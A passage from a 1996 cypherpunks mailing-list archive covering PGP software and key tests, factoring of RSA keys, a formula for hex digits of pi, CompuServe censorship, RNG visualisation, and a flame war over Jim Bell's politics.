if we're limiting the links to around 300 meters, the total amount of water
between "here" and "there" CAN'T be all that great.  And in addition, one of
the advantages of computer networking over telephone-type networking is that
we can "tolerate" (although, not LIKE) the occasional necessity of
re-transmitting data.  And dynamic re-routing is probably far easier than
for real-time telephone-type data.

>From the standpoint of computer networking, the main benefit of IR is to
cross rights-of-way without permission or trenching (or stringing cables
from telephone poles) in urban and suburban areas, allowing data transfer
near-fiber speeds.   In an urban setting, a single tall building could
become a central hub for most of its nearest neighbors.   I don't anticipate
IR being used "to the home" (especially since residential areas have trees,
etc); rather, I would imagine that it would be used to feed the occasional
top-of-the-telephone-pole microcell, with very-low-milliwatt (or high
microwatt) RF going the last 100 meters or so to the home.  This would allow
a non-phoneco, non-cableco company to offer bidirectional networking in an
entire residential area with an absolute minimum of costs/rights aquisition.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MMiller224@gnn.com (Matthew Miller)
Date: Thu, 4 Jan 1996 23:15:40 +0800
To: cypherpunks@toad.com
Subject: Please take me off your mailing list
Message-ID: <199601040240.VAA03543@mail-e1a.gnn.com>
MIME-Version: 1.0
Content-Type: text/plain


Please take me off your mailing list...I can't keep up with all this mail.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 5 Jan 1996 23:13:36 +0800
To: cypherpunks@toad.com
Subject: testing WPGP
Message-ID: <m0tY5ea-00096TC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I'm trying to test out version 1.5.0.10 of the program WPGP that I
downloaded a day ago.  So far, I am able to sign messages and (probably?)
encrypt them, but decrypting fails me.  Below is my 1024-bit public key;
could somebody verify the proper signing, and send something encrypted to
me?  (Also include your public key and I'll see if I can successfully reply.)

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAi1zvWcAAAEEAKmSqngLWK2N2gOJKPtjF9VCfSkXY+XUZBRCbbFU71uH/dLX
C2Uq6wFS8alRgMc3rp90JnnJ/6eJqXwMjCunogwucWOaU7S/w+OwjOG9fUqsXIA6
2j25Wtjce65mbp0TKLAzwMb/P/Qq7BlclqhuKzfVBH7dIHnVAvqHVDBboB2dAAUR
tBFKYW1lcyBEYWx0b24gQmVsbA==
=G3LA
- -----END PGP PUBLIC KEY BLOCK-----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOzCPvqHVDBboB2dAQGHDgP6ApIYzoZs2LBK5c8p3H+BHzMevgf2zuWy
oTt9kiMrirrzsZQ+aGfKTEk3HaEcg9c2bgbM4JjfeZQLXI53edYl5DNuh4newvry
PwRLf7eYOtPsxfEMAsmcJkuiwvk1czOZZ/fW+dK5mbsZQ/c5fgcWILvFuey9uOd2
lZ7zqD/Kt54=
=/qXq
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 5 Jan 1996 14:04:57 +0800
To: cypherpunks@toad.com
Subject: Forcible Concryption of Data
Message-ID: <ad11fb1c11021004a081@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



>anonymous@freezone.remailer wrote:
>> Does anyone understand what this "Concryption" really is? Reading the
>> press blurbs, it could be nothing more than simply compressing the
>> stream before encrypting it. A patent on that idea would be rather
>> awkward.

"Concryption" is the process by which your secret data gets enlisted in
service to the government, as with Clipper and GAK. The original term when
people got pressed into military service was "conscription," but times
change.

Thus, one might say, "My secrets have been concrypted--the government now
has them."

(After all, why do you think so many software releases are called "drafts"?)

--Klaus!



We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 6 Jan 1996 01:03:10 +0800
To: cypherpunks@toad.com
Subject: Re: Windows Eudora and PGP
Message-ID: <199601050721.XAA01227@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>1)  Use cut-and-paste into Private Idaho.  Private Idaho will allow you to
>>>paste back into Eudora.  (Or you can send out from Private Idaho directly.)
>>>This option is useful becuase it supports nyms and chaining of remailers.
...
>>[sigh]  Just what I thought, no easy solutions. 

Private Idaho's pretty easy - if you're replying to a message,
you'll need to do a cut&paste to move the original into PI,
but it follows all the standard Windows cut&paste clipboard stuff,
and after that you can send the message directly (from newer
versions of PI) or pick a menu item that hands it back to
your mailer (Eudora or several others are supported) for delivery.
Inside PI, you can pick menu items to call PGP, add remailer headers, etc.

At 07:46 PM 1/3/96 -0500, "Douglas F. Elznic" <delznic@storm.net> wrote:
> I have also heard that ViaCrypt is a good alternative. But I am not sure.
>Has anyone else out there heard anything good/bad about ViaCrypt?

I've got the ViaCrypt Windows package, as well as their DOS versions.
It's really nice for key management (which Private Idaho doesn't do
much of), though some of the other PGP Windows frontends also do that.
Its encryption/decryption/signing functions are mainly oriented towards files
rather than Clipboards - the big advantage of this is that there aren't any
silly 64KB or 640KB limits anywhere, but it's a bit clumsier.
I usually use Private Idaho as a front-end to ViaCrypt as well;
it's faster and prettier to have ViaCrypt handling the Windows interfaces
than to have PI pop up a DOS window to run Real PGP in.

The PGP 3.0 stuff, when it comes out, will help the process a lot.
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "The price of liberty is eternal vigilance" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Fri, 5 Jan 1996 19:57:58 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Double Messages from Ed Carp
In-Reply-To: <2.2.32.19960105050514.0096c610@mail.teleport.com>
Message-ID: <Pine.OSF.3.91.960104233244.2710A-100000@francis.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain


I have been seeing duplicates also, but it seems to be random. Some from Ed,
and some from others. 

Dan

On Thu, 4 Jan 1996, Alan Olsen wrote:

> At 07:19 PM 1/4/96 -0800, Tim May wrote:
> 
> >In looking at the detailed headers of a pair of such duplicates I see that
> >there may have been some kind of "fork" (not a technical term, just a
> >description) where the two messages (called Blue and Red) differ as
> >follows:
> >
> [Weirdness deleted]
> 
> I am seeing the duplicates with another user as well.
> 
> Received: (from lastxit@localhost) by arrakis.alphachannel.com
> (8.6.12/8.6.12) id SAA10251; Wed, 3 Jan 1996 18:52:35 -0600
> To: cypherpunks@toad.com
> From: "Marc Martinez"   <lastxit@alphachannel.com>
> In-Reply-To: master@internexus.net's message of 3 Jan 1996 13:44:30 -0500
> Subject: Re: 2047 bit keys in PGP
> 
> Received: (from lastxit@localhost) by arrakis.alphachannel.com
> (8.6.12/8.6.12) id SAA10237; Wed, 3 Jan 1996 18:50:10 -0600
> Date: Wed, 3 Jan 1996 18:50:10 -0600
> To: cypherpunks@toad.com
> From: "Marc Martinez"   <lastxit@alphachannel.com>
> In-Reply-To: master@internexus.net's message of 3 Jan 1996 13:44:30 -0500
> 
> This might be an isolated problem with this user or someplace between here
> and there is duping mail messages...
> 
> I thought there were more but it turned out to be a bunch of messages I was
> cc:ed on and it got caught in the filter.
> 
> 
> 
> Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
>         `finger -l alano@teleport.com` for PGP 2.6.2 key 
>               http://www.teleport.com/~alano/ 
> "Governments are potholes on the Information Superhighway." - Not TCMay
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Fri, 5 Jan 1996 13:00:12 +0800
To: Cedric Tefft <CedricT@datastorm.com>
Subject: Re: 2047 bit keys in PGP
In-Reply-To: <30EC5109@ms-mail.datastorm.com>
Message-ID: <9601050442.AA25099@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    From: Cedric Tefft <CedricT@datastorm.com>
    Date: Thu, 04 Jan 96 14:12:00 PST

    >And they strongly imply that brute-force attacks against 256-bit
    >keys will be infeasible until computers are built from something
    >other than matter and occupy something other than space."

    Hmmm... Well, the 384-bit Blacknet PGP key was cracked in just a
    few months.  How?

Factoring a 384-bit number is not equivalent to searching a 384-bit
keyspace.  Consider that there are 78498 primes less than 1000000.
This means that you can do a brute force search of a keyspace of under
17-bits to find a prime factor of any composite number less than
1000000000000 -- a bit under 40 bits.  I've done this to verify the
results of an implementation of the Rabin-Miller primality test on
relatively small numbers.  I'm not sure how many primes there are with
192 or fewer bits, but it's far fewer than 2^384.

There are better techniques around for factoring large numbers than
this sort of brute force testing.  While I didn't follow the thread
very closely, they probably used the quadratic sieve or number field
sieve algorithm.  See Schneier's _Applied_Cryptography_ for more on
factoring, including references to more detailed works.

--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key
A `hacker' is one who writes code.  Breaking into systems is `cracking'.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 5 Jan 1996 23:22:26 +0800
To: cypherpunks@toad.com
Subject: Re: Representations of Pi, etc.
Message-ID: <ad11fe741202100469b4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:19 AM 1/5/96, jim bell wrote:

>But BTW, isn't it interesting, that news item from a few weeks ago, on an
>algorithm for determining individual bits in Pi, regardless of whether
>you've calculated all the previous ones.  Only problem is, it only works in
>hexadecimal (and, obviously, binary, etc, not decimal.
                                           ^^^^^^^^^^^

???

I didn't see this result you mention, but it surprises me. The part about
how it works in some bases, but not in decimal.

The "hand-waving" (motivational/informal) explanation for why I am
surprised is that "Nature doesn't care about bipeds with 10 digits vs.
bipeds, or whatever, with 2 digits or 16 digits." That is, results
applicable in base 16, hexadecimal, should be easily applicable in base 10.

And there is are interesting properties about the distribution of digits in
"random" numbers. Pi is of course not random by many definitions, but
shares certain important properties with random numbers. (Or sequences, if
you wish.) One of these is properties is that of _regularity_, the
frequency of digits. A regular number is one whose expansion has in the
limit the same frequency for all digits, and this is so in any base. Thus,
a regular number has an equal frequency (in the limit, blah blah) of 0s,
1s, 2s, 3s, etc. And switching to another base will not change this.

I recollect that pi has been proved to me regular, i.e., that pi has an
equal frequency of all digits, in the limit, in all bases.

(This is the sense in which we can argue that pi is "random." in the sense
that there are no correlations, no dependence of the n+1th digit on the nth
digit, and "no apparent order." Furthermore, there is no effective
compression of pi, except by some tricks, such as _naming_ it (a dictionary
compression, of sorts) or by specifying a program which computes it. Lots
of interesting issues about the real meaning of randomness and
compressability, about the "logical depth" of certain computations, etc. I
recommend "The Universal Turing Machine" (ed. by Haken, as I recall) for a
nice set of articles on these fascinating issues.)

In summary, I would be surprised to find that a method for calculating the
Nth digit of pi works for base N but not for base M (modulo some minor
efficiency factors related to machine architecture, etc.).

Any pointers to this result would be appreciated.

--Tim May

(By the way, randomness and regularity, real or only apparent, are some of
my favorite topics. Numbers which _appear_ to be regular, but which
actually aren't, are said to be "cryptoregular" (hidden regular). The
connection with cryptography is more than tangential: a text block or
number which _appears_ to be random or regular (the same frequency
definition applies to letters as well as digits) may be transformed by
application of a key to a nonrandom or nonregular thing. The connection
with entropy and randomness is right there, of course, and is left for the
interested folks to think about.)


We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Hammer <jh@teleport.com>
Date: Fri, 5 Jan 1996 16:46:47 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: "Deterrence"
In-Reply-To: <m0tXt3j-000952C@pacifier.com>
Message-ID: <Pine.SUN.3.91.960105000856.15192C-100000@julie.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 4 Jan 1996, jim bell wrote:

> Recently, Kevin Wheeler (on NWLIBERTARIANS@TELEPORT.COM) expressed what I
> consider to be odd (at least for him; I can easily deal with Benneth's crap)
> (and a bit belated) objections to my desire to use technology to prevent
> government from oppressing the public. 

Well I'm really pleased to hear that you're considering actually dealing 
with someone's objections to your insane ideas, rather than hiding out 
like a little crybaby. 

But really, there's not much to object to. No one is taking you seriously 
Mr. Bell. If anyone did, you'd probably be in jail by now.

In part, I must thank you for helping me to see what the actual 
Libertarian mindset is capable of. That more people haven't immediately 
and unequivocably confronted you on your murderous plans to institute a 
new regime of terror and lawlessness indicates to me that the average 
Libertarian is philosophically bankrupt. The best that could be said for 
them is that they're humoring you.

BTW, my show is being scheduled to go daily for North American broadcast 
via the TVRO satellite, and I may be doing drive time daily from 
Vancouver to Portland. So consider each waking day a new opposition from 
Jack Hammer. When you roll out of your fart sack each evening (or 
whenever you rise from yhour grave) consider that I will have been 
already up making statements against your plans for assassination, and 
consider that, should you ever manage to actually be awake at such an 
early hour, you can meet me in verbal combat simply by reachning over and 
picking up your phone. 

Of course you won't do it. You've had numerous opportunities to give 
voice to your maniacal plans on my show, but you've chickened out then, 
you'll chicken out now.

-jac

jh@teleport.com 

FLASHNEWSHAMMERNET- Honoring the tradition of Emerson, Thoreau, and
Ghandi, Hammer World Radio goes on the air daily 2-3pm PST beginning on
Reverend Doctor Martin Luther King Junior's birthday, January 15, 1997,
with a MESSAGE OF CIVIL DISOBEDIENCE TO THE WRONG WORLD ORDER.

                           HOW TO JOIN THE HAMMERNET. 

Receive the most interesting e-mail and get to know the best writers on
the Internet. Saints and flamers, they're on the Hammernet! Here's how to
join. Send the following message in the body of your text space to
majordomo@teleport.com : 

                           subscribe hammernet-l

                           It's as easy as that!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Fri, 5 Jan 1996 23:20:33 +0800
To: cypherpunks@toad.com
Subject: Re: Windows Eudora and PGP
Message-ID: <2.2.32.19960104183919.00677094@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

At 07:46 PM 01/3/96 -0500, Douglas F. Elznic" <delznic@storm.net> wrote:
... <deletia regarding PGP and Eudora> ...
>I have heard that their are alpha releases currentky geing worked on at
>quest/qualcomm. But i would have to say before they come out your best bet
>to pgp and eudora is either pidaho or just use it in dos. pidaho is a great
>front end. A lot better than any others out their.
>
> I have also heard that ViaCrypt is a good alternative. But I am not sure.
>Has anyone else out there heard anything good/bad about ViaCrypt?

I've gotten ahold of the WPGP mentioned here a couple days ago, and it seems
to be working just fine, for me. Even easier to use than PIdaho, though not
quite as 'full-featured' (ie, remailer support, etc).

Using it to sign this message, FWIW :-)
- - -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOwCBMVrTvyYOzAZAQGpVgQApdkjY9KoiI4TYhd6h8at6R1DfEFldE0M
y9iY3lcUjGuCn6RASVUxbDXVYWtbeCPGveaAfIri6ccM2Fcw6WboS2YXM7Xmpubr
7j6o48IwKB0YZadwtxRXQWddE3RUwbIa52xmmywdlshLGy7IEAJ+NHgrlZZk/sdR
SilciAe65Hs=
=0izb
- - -----END PGP SIGNATURE-----

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOwCPsVrTvyYOzAZAQEjzAP/bEK4Q/uJgbXY9/HMp+Cu1YF/1x1/tlI5
T3b1Vb4WvsZCUbGlMzqzNKFO6qJoMxGGQoVi3LzWixGEVeaD93QJGQXtR3p/v2HS
fogEk5bVFr6+ljreuhLDhl4sQpNx+fnibXg013zb2dKv0btwTst+vh7Vm1vYZ84T
uJFMVZPxL+I=
=xUTN
- -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOwCasVrTvyYOzAZAQFY5wP9HdMiDu1cqShuz6GPjNNzNwtEbXaxfDsQ
sWZq0tcSkIVaY7vix8X02PxV7tqMqdbyBBnO9n6unRhitJfuTtJ1Fh7lGB/6/TtU
o2/7510JcwyfVXB3Lb6tenvu0G9aQrkGqzoHcSXr854GzsU2KfjGEM9l9xpczj+B
O5wiYXU00yc=
=tkkz
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"It is not the function of our Government to keep the citizen
from falling into error; it is the function of the citizen to
keep the Government from falling into error."
Robert H. Jackson (1892-1954), U.S. Judge
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sudduth, Larry" <SudduthLM@SecureC2.com>
Date: Fri, 5 Jan 1996 20:02:08 +0800
To: "'Bill Frantz'" <tony@secapl.com>
Subject: Compuserve grovels to foreign censors
Message-ID: <c=US%a=_%p=SecureC2%l=SC2960105005614AH005700@sc2>
MIME-Version: 1.0
Content-Type: text/plain


At 15:05 1/4/96, Bill Frantz wrote:
>Caller ID could tell them where you are calling from.  They can also use
>their billing information and user profile information to decide where you
>live and/or how old you are.  I wonder if any of these filters will keep
>the German prosecutors off their necks, given that they can be bypassed.

I don't know whether or not one can presume the existence of Caller ID over
in Germany.  When I lived there (albeit several years ago), it was a 
frustrating
mixture of old technology (no records of any calls, just a counter that 
registered
message units, so one could get a monster phone bill, and not even contest 
it)
and new (ISDN and the German Post's version of BTX, Bildschirmtext).

>I feel sorry for them given the situation they are in, and want to kick
>their butts for just rolling over dead instead of fighting for free 
access.

Feeling much the way you do about CompuServe's actions, I voted with my
wallet, and canceled my membership.  More and more vendors are offering
equivalent support through the I'net anyway.  The vision of a tin horn
prosecutor in Munich being successful will only fuel the zeal of the 
would-be
censors here and elsewhere in the World.  (I wonder if the Revolutionary
Guards in Iran are discussing what they next want censored.)

BTW, I've never been an alt.* group reader, etc.  That being said, who is
CompuServe to try to control access to it.  CompuServe is transport-only, 
and
not a content originator.  Since the Una-bomber used Fed-Ex to kill his 
victims
should Fed-Ex no longer deliver to US addresses?




begin 600 WINMAIL.DAT
M>)\^(AX%`0:0" `$```````!``$``0>0!@`(````Y 0```````#H``$%@ ,`
M#@```,P'`0`%````. `)``4`'P$!"8 !`"$```!%1C8U,# Y0S8X-#9#1C$Q
M.$$P,# P-C X0S8X13<W10`5!P$@@ ,`#@```,P'`0`%````. `=``4`,P$!
M"( '`!@```!)4$TN36EC<F]S;V9T($UA:6PN3F]T90`Q" $$@ $`)@```$-O
M;7!U<V5R=F4@9W)O=F5L<R!T;R!F;W)E:6=N(&-E;G-O<G,`=0X!#8 $``(`
M```"``(``0.0!@!D!P``$@````L`(P``````"P`I```````#`"8```````,`
M-@``````'@!P``$````G````36%S<V5Y+"!#14\@;V8@0V]M<'5S97)V92P@
M;VX@26YT97)N970```(!<0`!````&P````&ZVRK;.IP`991&:!'/B@``8(QH
MYWX``5:S40`#``80\D%G_@,`!Q#Y! ``'@`($ $```!E````050Q-3HP-3$O
M-"\Y-BQ"24Q,1E)!3E1:5U)/5$4Z0T%,3$52241#3U5,1%1%3$Q42$5-5TA%
M4D593U5!4D5#04Q,24Y'1E)/351(15E#04Y!3%-/55-%5$A%25)"24Q,24Y'
M20`````#`! 0``````,`$1 ``````@$)$ $```"T!0``L 4``-H)``!,6D9U
MG-MAO?\`"@$/`A4"J 7K`H,`4 +R"0(`8V@*P'-E=#(W!@`&PP*#,@/%`@!P
M<D)Q$>)S=&5M`H,SMP+D!Q,"@S02S!3(-0/&713%?0J ",\)V3L8SS(\-34"
M@ J!#;$+8&YG&#$P,Q10"P-L:3.^-@WP"U46\@P!$U!O$]!Z8P5 005 `% +
M515B,G42L&,`0" 6\!S_'@,Z+QZ?'Z <WQWE-1YP+S2P+SDV+ KA(7]"`Q#)
M`R!&<@!P='HDEQUM2G<=XCH*A3Y#!T!L(020($E$( 6@=6S,9" 3T"7Q=&@3
MX"?PTRI &- @>0A@( K *L F8RCQ"X!G( -2+B!T(%0J0'DK40.@!T!SN&\@
M=1&P"H<DSSXFG^L=]"HQ:07 8B7A*Z(+@&4"$'(`P'1I`B K$&[O*< M,07 
M'=%F`Q JP#%J]G0M$ 6!:0VP*G@M;RY_6QU>')!V*L R(2\%L6B^;P?@!O I
MP"KE+"%))_#W`B $@3%09C(1+( RT"HB?Q&P*] #$!/0$: G\"7B:ST)X' U
M+S8_+X\J0"!'SP20`X(=T1&P8W4S\#P!ES+0.S,PL6X%D&MS)("^9SA1,]$1
M@#!C+(1B*L#<8GD*L 00"8 N/,T=9*X@"H\>[#H@9 (@)P5 _&MN.1$J@2HQ
M!< %L4A WP5 `B K0D!R!Y!U!X _T\QE> 0`$]!N8RK .R%U*.AO.&!R1<4+
M@$ 5>?TL(5<J0 .@.B X0BG!*I/V* = 0Z!I!4 1L$PQ!T"-*M!E$9$K$&=O
M*22 O4\A=T0`*Q KT2TP="8PAS'0*[%%Q6UI>'0(<+=+,SE"'@%H2$ 88&<L
M@-HH2$ @&- %H61!,CK3^RMB0C%J44%0\2F!`C I(7]"PQC00F 3P1C14>8'
MD'/_4# JP%8@3R!",2T!27,ID]]8,%7"!& `@%9"<#D`28'_,.(D@#(B23)/
M80.@!:!6,3M5L4\@*47%6T,'T2A)6%-$3C(3/^E00+!T/B<$($PQ`) Q\3LA
M0E2^6"2 )=%4@!%P,+!M$]#]4G I1%9%RQR;/;\^SSH1SF8)X ,@+0!R<BR 
M,8'_*B1"9BK `)!2@#.5+&(K(I\+@%LD4, ",#/B:VE"$/\\SV.O/N\PE$#P
M6)!F<U63[P-@*X1,(C0182G "X 3P>=O@3LA,N!G:%&39H(#4-L)X"L08TL@
M!! N:I\?H,UA?$9EX2NB;741<#_3_U# +( JXD?0*Q &X$#P2W#Y`W!P=09A
M.&!?00#0,=)[0C$Z('8=\6E!3R!TL&V_+(!A[V+_'Y%0P"D!=%LD_RRA2R I
M$"G >%$'@ ;0._'U8-!P+"%-!; X<UGQ*K%_0H%'T% "4J-ET 404;AE/'%U
M.% '0 GP3S%U<&YP&'$J(0-@=7" /]-)_B=!\%7!.O!U$2PD7V $`/]?M5$`
M49$X\02A1<5 F$S"?DU8872A3P$KL4H@<9-F=RF@/"0"(&QF80I0*A,@OGI/
MX(<Q.S,Z,2FA+4.A_T7%2R `@$$2*I,R(BGP$;#W*H1,T3_B5P6P*; L(5VP
M^SHY/^)23V &\$#P,>$*P+IY1<5'9^!4<DS1228Q_2L39 0`0. $$"NB*H!"
MYO]!\%)P:52)]$0Q7+9%Q6 @^E=W82<X84'P;R)#H$*1L2RS="XJ0E"!$7!4
M(>]O@ 20)( 1P&,L(T+AA?7]"W!D)( J@"T0! !%Q78H_S/B46 L@#/Q7!)N
MD7%U,^)_3R L(9B)! "940!Q@*(M_X=26R-%Q4DR5>)6,6F!!;#?<' +@#' 
M!; L(5,+@$LA_3_B58XPB4 #<'R!+2(IP/-T`(DP17AII"7Q8-!?4?MI\#'0
M;9@&?+ IDZ$55 &_&& ;T&\S.$)682T0507PS6^ 9$H!$;!S/VHO'S8O'<>F
M+W*>%_$`JI! `#D`(+FB@C+;N@$"`4<``0```#(```!C/553.V$](#MP/5-E
M8W5R94,R.VP]4')I=F%T92!-1$(M.38P,3 U,#4U-C$P6BTY````0 `', #(
MA.$PV[H!0 `(,.!,WXXRV[H!'@`]``$````!``````````(!%#0!````$ ``
3`%24H< I?Q ;I8<(`"LJ)1=K< `]
`
end




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Fri, 5 Jan 1996 22:00:11 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: cyphernomicon FTP site?
Message-ID: <ad12576801021004b109@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 12:58 AM 12/20/95, Harry Bartholomew wrote:
....
>    When using lynx from my shell account, I like to grab the whole
>    thing at once at net speed.  Just now this took 65 seconds for
>    the 1.28 Mb with obvious pauses ( I've seen it twice as fast).
....
I was using Lynx just now to do something like this (Mediacity was kaput).
I couldn't find out how to tell lynx to save the file. Do you know how?
Thanks






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Fri, 5 Jan 1996 15:49:04 +0800
To: Cypherpunks@toad.com
Subject: Visual Correlations of RNGs useful for cryptanalysis?
Message-ID: <199601050740.CAA26664@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Somebody passed an interesting article to me, "Random number 
generators: pretty good ones are easy to find", Clifford Pickover 
(IBM Watson Research Ctr, NY), The Visual Computer (1995) 11:369-377.

The article does NOT deal with cryptographically secure RNGs, however 
the author discusses some interesting methods for visualizing 
correlations in RNGs that probably can be applied to crypto.

One is the "Noise Sphere", which involves plotting the last three 
numbers generated by the RNG (Xn, Xn+1, Xn+2, where 0<Xn<1, and 
n=0,1,2,3...N) on spherical coordinates (r, theta, phi), where

  theta = 2 * pi * Xn
  phi = pi  * Xn+1         (note, X subscript n+1)
  r = sqrt(Xn+2)            (  "      X subscript n+2)

The article includes some pretty interesting graphics, including a 
couple that demonstrate what crappy RNGs look like.  Also discusses 
some other methods (terrain generation) for visualization.

Advantage is that this type of test is that it can be done on a 
low-end PC, can show some complex correlations even when an RNG is 
statistically good, and one doesn't have to an expert to see when 
something is wrong.

Crypto output (bytes, words, dwords, etc.) can be easily(?) translated into 
binary fractions for this type of test.

Take care,

--Rob
--- "Mutant" Rob <wlkngowl@unix.asb.com>

Send a blank message with the subject "send pgp-key"
(not in quotes) for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Sulzberger <jays@cloud9.net>
Date: Fri, 5 Jan 1996 23:27:17 +0800
To: cypherpunks@toad.com
Subject: Three recent posts on usenet about getting far hex digits of pi.
Message-ID: <Pine.BSI.3.91.960105044051.823A-100000@cloud9.net>
MIME-Version: 1.0
Content-Type: text/plain



For Timothy C. May and all the cypherists on this list:

Here are three recent posts to usenet on the beautiful, and partly new 
results on getting digits far out in pi, without explicitly getting all 
the nearer to the heximal point digits.

> From sci.math Wed Dec 20 05:16:17 1995
> Path: panix!news.denver.eti.net!imci3!imci2!newsfeed.internetmci.com!uwm.edu!msunews!netnews.upenn.edu!red.seas.upenn.edu!jimmosk
> From: jimmosk@red.seas.upenn.edu (Jim J Moskowitz)
> Newsgroups: sci.math
> Subject: nth digit of pi calculable?
> Date: 18 Dec 1995 03:29:08 GMT
> Organization: University of Pennsylvania
> Lines: 29
> Message-ID: <4b2n64$s27@netnews.upenn.edu>
> NNTP-Posting-Host: red.seas.upenn.edu
> Status: RO
> X-Status: 
> 
> I've seen the recent reports about the discovery of a formula for pi 
> of the form 
>        infinity
>         -----
>         \        (- n) /   4         2         1         1   \
>          )     16     (------- - ------- - ------- - -------  )
>         /              \8 n + 1  8 n + 4   8 n + 5   8 n + 6 / 
>         -----
>         n = 0
> 
> which is said to tell you in a simple manner what the nth digit in the
> hexadecimal expansion of pi is.  I don't see why.  Yes, the ith term of
> this series does include 16^-i, which is the ith place in said expansion,
> but the term in parentheses (sorry; they look more like angle brackets)
> isn't an integer, so it's not giving you the value of the number in that
> ith place.  Instead, it gives you several digits which are in places further
> along in pi, with no guarantee that other terms in this sigma won't also
> include digits in those places, forcing you to calculate and add up many
> terms....
> 
> Taking an incautious plunge into the world of computational math,
> Jim
> 
> 
> -- 
> ----------------------------------------------------------------------------- 
>      Jim Moskowitz (jimmosk@eniac.seas.upenn.edu)
>                      Visit the Unknown Composers Page:
>                            http://www.seas.upenn.edu/~jimmosk/TOC.html
> 
> >From sci.math.pi Fri Jan  5 04:08:06 1996
> From sci.math Wed Dec 20 05:16:57 1995
> Path: panix!cmcl2!oitnews.harvard.edu!purdue!lerc.nasa.gov!magnus.acs.ohio-state.edu!math.ohio-state.edu!howland.reston.ans.net!newsfeed.internetmci.com!EU.net!peer-news.britain.eu.net!lyra.csx.cam.ac.uk!cet1
> From: cet1@cus.cam.ac.uk (Chris Thompson)
> Newsgroups: sci.math
> Subject: Re: nth digit of pi calculable?
> Date: 18 Dec 1995 15:21:18 GMT
> Organization: University of Cambridge, England
> Lines: 46
> Message-ID: <4b40te$r02@lyra.csx.cam.ac.uk>
> References: <4b2n64$s27@netnews.upenn.edu>
> NNTP-Posting-Host: grus.cus.cam.ac.uk
> Status: RO
> X-Status: 
> 
> In article <4b2n64$s27@netnews.upenn.edu>, jimmosk@red.seas.upenn.edu 
> (Jim J Moskowitz) writes:
> |> I've seen the recent reports about the discovery of a formula for pi 
> |> of the form 
> |>        infinity
> |>         -----
> |>         \        (- n) /   4         2         1         1   \
> |>          )     16     (------- - ------- - ------- - -------  )
> |>         /              \8 n + 1  8 n + 4   8 n + 5   8 n + 6 / 
> |>         -----
> |>         n = 0
> |> 
> |> which is said to tell you in a simple manner what the nth digit in the
> |> hexadecimal expansion of pi is.  I don't see why.  Yes, the ith term of
> |> this series does include 16^-i, which is the ith place in said expansion,
